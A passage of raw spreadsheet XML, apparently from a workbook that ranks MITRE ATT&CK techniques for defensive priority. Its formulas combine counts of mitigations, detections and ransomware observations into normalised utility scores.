        <f t="array" ref="AH574">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC574)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI574" s="25">
        <f>IF(AH574="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ574" s="25" t="str" cm="1">
        <f t="array" ref="AJ574">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC574)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK574" s="25">
        <f>IF(AJ574="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL574" s="25" t="str" cm="1">
        <f t="array" ref="AL574">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC574)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM574" s="25">
        <f>IF(AL574="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN574" s="60">
        <v>0</v>
      </c>
      <c r="AO574" s="51">
        <v>0</v>
      </c>
      <c r="AP574" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="AQ574" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR574" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS574" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT574" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU574"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75" spans="1:47">
      <c r="A575" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="B575" s="25">
        <f>SUM(H575,M575,V575)*(1+SUM(AE575,AG575,AI575,AK575,AM575))</f>
        <v>0.05</v>
      </c>
      <c r="C575" s="25" t="s">
        <v>1958</v>
      </c>
      <c r="D575" s="25" t="s">
        <v>1957</v>
      </c>
      <c r="E575" s="25" t="s">
        <v>1959</v>
      </c>
      <c r="F575" s="51">
        <v>0</v>
      </c>
      <c r="G575" s="51">
        <v>1</v>
      </c>
      <c r="H575" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I575">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J575">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K575">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L575">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M575" s="25">
        <v>0</v>
      </c>
      <c r="N575" s="51">
        <v>0</v>
      </c>
      <c r="O575" s="51">
        <v>0</v>
      </c>
      <c r="P575" s="51">
        <v>0</v>
      </c>
      <c r="Q575" s="51">
        <v>0</v>
      </c>
      <c r="R575" s="51"/>
      <c r="S575" s="51">
        <v>0</v>
      </c>
      <c r="T575" s="51"/>
      <c r="U575" s="51">
        <v>0</v>
      </c>
      <c r="V575" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W575">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X575">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y575">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z575">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA575">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB575">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC575" s="29"/>
      <c r="AD575" s="25" t="str" cm="1">
        <f t="array" ref="AD575">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC575)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE575" s="25">
        <f>IF(AD575="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF575" s="25" t="str" cm="1">
        <f t="array" ref="AF575">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC575)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG575" s="25">
        <f>IF(AF575="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH575" s="25" t="str" cm="1">
        <f t="array" ref="AH575">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC575)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI575" s="25">
        <f>IF(AH575="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ575" s="25" t="str" cm="1">
        <f t="array" ref="AJ575">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC575)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK575" s="25">
        <f>IF(AJ575="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL575" s="25" t="str" cm="1">
        <f t="array" ref="AL575">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC575)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM575" s="25">
        <f>IF(AL575="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN575" s="52">
        <v>0</v>
      </c>
      <c r="AO575" s="51">
        <v>0</v>
      </c>
      <c r="AP575" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="AQ575" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR575" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS575" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT575" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU575"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76" spans="1:47">
      <c r="A576" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="B576" s="25">
        <f>SUM(H576,M576,V576)*(1+SUM(AE576,AG576,AI576,AK576,AM576))</f>
        <v>0.05</v>
      </c>
      <c r="C576" s="25" t="s">
        <v>1960</v>
      </c>
      <c r="D576" s="25" t="s">
        <v>1957</v>
      </c>
      <c r="E576" s="25" t="s">
        <v>1961</v>
      </c>
      <c r="F576" s="51">
        <v>0</v>
      </c>
      <c r="G576" s="51">
        <v>1</v>
      </c>
      <c r="H576" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I576">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J576">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K576">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L576">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M576" s="25">
        <v>0</v>
      </c>
      <c r="N576" s="51">
        <v>0</v>
      </c>
      <c r="O576" s="51">
        <v>0</v>
      </c>
      <c r="P576" s="51">
        <v>0</v>
      </c>
      <c r="Q576" s="51">
        <v>0</v>
      </c>
      <c r="R576" s="51"/>
      <c r="S576" s="51">
        <v>0</v>
      </c>
      <c r="T576" s="51"/>
      <c r="U576" s="51">
        <v>0</v>
      </c>
      <c r="V576" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W576">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X576">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y576">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z576">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA576">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB576">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC576" s="29"/>
      <c r="AD576" s="25" t="str" cm="1">
        <f t="array" ref="AD576">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC576)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE576" s="25">
        <f>IF(AD576="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF576" s="25" t="str" cm="1">
        <f t="array" ref="AF576">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC576)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG576" s="25">
        <f>IF(AF576="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH576" s="25" t="str" cm="1">
        <f t="array" ref="AH576">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC576)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI576" s="25">
        <f>IF(AH576="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ576" s="25" t="str" cm="1">
        <f t="array" ref="AJ576">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC576)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK576" s="25">
        <f>IF(AJ576="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL576" s="25" t="str" cm="1">
        <f t="array" ref="AL576">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC576)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM576" s="25">
        <f>IF(AL576="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN576" s="60">
        <v>0</v>
      </c>
      <c r="AO576" s="51">
        <v>0</v>
      </c>
      <c r="AP576" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="AQ576" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR576" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS576" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT576" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU576"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77" spans="1:47">
      <c r="A577" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="B577" s="25">
        <f>SUM(H577,M577,V577)*(1+SUM(AE577,AG577,AI577,AK577,AM577))</f>
        <v>0.05</v>
      </c>
      <c r="C577" s="25" t="s">
        <v>1962</v>
      </c>
      <c r="D577" s="25" t="s">
        <v>1963</v>
      </c>
      <c r="E577" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F577" s="51">
        <v>0</v>
      </c>
      <c r="G577" s="51">
        <v>1</v>
      </c>
      <c r="H577" s="35">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I577">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J577">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K577">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L577">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M577" s="25">
        <v>0</v>
      </c>
      <c r="N577" s="51">
        <v>0</v>
      </c>
      <c r="O577" s="51">
        <v>0</v>
      </c>
      <c r="P577" s="51">
        <v>0</v>
      </c>
      <c r="Q577" s="51">
        <v>0</v>
      </c>
      <c r="R577" s="51"/>
      <c r="S577" s="51">
        <v>0</v>
      </c>
      <c r="T577" s="51"/>
      <c r="U577" s="51">
        <v>0</v>
      </c>
      <c r="V577" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W577">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X577">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y577">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z577">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA577">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB577">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC577" s="29"/>
      <c r="AD577" s="25" t="str" cm="1">
        <f t="array" ref="AD577">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC577)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE577" s="25">
        <f>IF(AD577="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF577" s="25" t="str" cm="1">
        <f t="array" ref="AF577">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC577)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG577" s="25">
        <f>IF(AF577="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH577" s="25" t="str" cm="1">
        <f t="array" ref="AH577">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC577)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI577" s="25">
        <f>IF(AH577="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ577" s="25" t="str" cm="1">
        <f t="array" ref="AJ577">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC577)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK577" s="25">
        <f>IF(AJ577="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL577" s="25" t="str" cm="1">
        <f t="array" ref="AL577">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC577)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM577" s="25">
        <f>IF(AL577="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN577" s="52">
        <v>0</v>
      </c>
      <c r="AO577" s="51">
        <v>0</v>
      </c>
      <c r="AP577" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="AQ577" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR577" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS577" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT577" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU577"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78" spans="1:47">
      <c r="A578" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="B578" s="25">
        <f>SUM(H578,M578,V578)*(1+SUM(AE578,AG578,AI578,AK578,AM578))</f>
        <v>0.05</v>
      </c>
      <c r="C578" s="25" t="s">
        <v>1964</v>
      </c>
      <c r="D578" s="25" t="s">
        <v>1881</v>
      </c>
      <c r="E578" s="25" t="s">
        <v>1965</v>
      </c>
      <c r="F578" s="51">
        <v>1</v>
      </c>
      <c r="G578" s="51">
        <v>0</v>
      </c>
      <c r="H578" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I578">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J578">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K578">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L578">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M578" s="25">
        <v>0</v>
      </c>
      <c r="N578" s="51">
        <v>0</v>
      </c>
      <c r="O578" s="51">
        <v>0</v>
      </c>
      <c r="P578" s="51">
        <v>0</v>
      </c>
      <c r="Q578" s="51">
        <v>0</v>
      </c>
      <c r="R578" s="51"/>
      <c r="S578" s="51">
        <v>0</v>
      </c>
      <c r="T578" s="51"/>
      <c r="U578" s="51">
        <v>0</v>
      </c>
      <c r="V578" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W578">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X578">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y578">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z578">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA578">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB578">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC578" s="29" t="s">
        <v>665</v>
      </c>
      <c r="AD578" s="25" t="str" cm="1">
        <f t="array" ref="AD578">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC578)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE578" s="25">
        <f>IF(AD578="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF578" s="25" t="str" cm="1">
        <f t="array" ref="AF578">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC578)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG578" s="25">
        <f>IF(AF578="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH578" s="25" t="str" cm="1">
        <f t="array" ref="AH578">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC578)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI578" s="25">
        <f>IF(AH578="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ578" s="25" t="str" cm="1">
        <f t="array" ref="AJ578">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC578)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK578" s="25">
        <f>IF(AJ578="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL578" s="25" t="str" cm="1">
        <f t="array" ref="AL578">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC578)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM578" s="25">
        <f>IF(AL578="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN578" s="52">
        <v>0</v>
      </c>
      <c r="AO578" s="51">
        <v>0</v>
      </c>
      <c r="AP578" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="AQ578" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR578" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS578" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT578" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU578"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79" spans="1:47" ht="32.1">
      <c r="A579" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.9899999999999997E-3</v>
      </c>
      <c r="B579" s="25">
        <f>SUM(H579,M579,V579)*(1+SUM(AE579,AG579,AI579,AK579,AM579))</f>
        <v>5.9900000000000002E-2</v>
      </c>
      <c r="C579" s="25" t="s">
        <v>1966</v>
